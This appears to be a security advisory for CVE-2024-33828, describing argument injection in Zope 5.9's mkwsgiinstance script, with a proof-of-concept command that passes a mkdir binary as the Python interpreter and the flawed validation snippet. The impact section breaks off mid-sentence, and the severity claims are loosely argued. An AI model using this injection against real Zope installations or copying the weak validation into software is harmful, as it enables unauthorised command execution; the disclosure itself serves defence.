Zope version 5.9 suffers from a command injection vulnerability in /utilities/mkwsgiinstance.py.
advisories | CVE-2024-33828
# Vulnerability Report
## Title: Command Argument Injection Vulnerability in Zope WSGI Instance Creation Script Leading to RCE
### Description:
A command Argument injection vulnerability has been identified in the Zope WSGI instance creation script used by the Zope web application server framework, which is maintained by the Zope Foundation. The script, mkwsgiinstance, facilitates the setup of new Zope WSGI application instances and involves specifying the Python interpreter among other parameters via command-line arguments. The flaw stems from insufficient validation of the Python interpreter path, allowing an attacker to execute arbitrary shell commands.
### Affected Product:
Product: Zope WSGI instance creation script (mkwsgiinstance)
Version: All versions prior to the most recent update
-Impact:
This vulnerability permits an attacker with local access to the server to execute arbitrary commands with the privileges of the user running the mkwsgiinstance script. The potential impacts include unauthorized information disclosure
### POC:
```bash
(env) root@lab:/opt/Zope# mkwsgiinstance -p "/usr/bin/mkdir" -d "/tmp/temp;"
Please choose a username and password for the initial user.
These will be the credentials you use to initially manage
your new Zope instance.
Username: d
Password:
Verify password:
(env) root@lab:/opt/Zope# ls /tmp
'temp;'
```
In this example, the attacker replaces the Python interpreter argument (-p) with the mkdir command, followed by an arbitrary directory path. Due to inadequate command-line argument sanitation, the script executes the mkdir command, thus illustrating arbitrary command execution.
### Vulnerable Code Snippet:
```python
if opt in ("-p", "--python"):
python = os.path.abspath(os.path.expanduser(arg))
if not os.path.exists(python) and os.path.isfile(python):
usage(sys.stderr, "The Python interpreter does not exist.")
sys.exit(2)
```
This code snippet fails to adequately validate the python variable that influences subprocess commands directly, enabling potential command injection when malicious inputs are utilized.
CVSS Calculated Vulnerability Score:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
### Credits:
This vulnerability was disclosed by Aymane MAZGUITI / Ilyase Dehy.